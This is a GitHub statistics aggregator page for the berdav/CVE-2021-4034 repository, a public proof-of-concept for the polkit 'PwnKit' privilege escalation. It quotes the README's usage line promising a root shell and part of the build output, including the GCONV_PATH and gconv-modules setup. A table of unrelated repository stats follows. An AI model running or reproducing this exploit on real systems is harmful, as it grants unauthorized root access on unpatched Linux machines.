berdav/CVE-2021-4034

CVE-2021-4034 1day

CMakefileShell
This is stars and forks stats for /berdav/CVE-2021-4034 repository. As of 27 Apr, 2024 this repository has 1853 stars and 513 forks.

CVE-2021-4034 One day for the polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory by the real authors is here PoC If the exploit is working you'll get a root shell immediately: vagrant@ubuntu-impish:~/CVE-2021-4034$ make cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall cve-2021-4034.c -o cve-2021-4034 echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules mkdir -p GCONV_PATH=. cp /usr/bin/true GCONV_PATH=./pwnkit.so:. vagrant@ubuntu-impish:~/CVE-2021-4034$...
Read on GithubGithub Stats Page
repotechsstarsweeklyforksweekly
floooh/sokolCObjective-CPython5.2k04270
OpenVPN/openvpnCShellM49.1k+172.8k+3
algorand/go-algorandGoCShell1.3k04350
openssl/opensslCPerlRaku22.8k010k0
madler/zlibCAdaPascal4.7k+132.3k+3
StanzaOrg/lbstanzaC++CJavaScript16030
stedolan/jqCM4Shell26.8k01.5k0
VirusTotal/yaraCYaccLex7.1k01.4k0
AvaloniaUI/AvaloniaC#Objective-C++TypeScript19.9k+661.7k+1
dotnet-architecture/eShopOnWebC#HTMLCSS9.2k04.8k0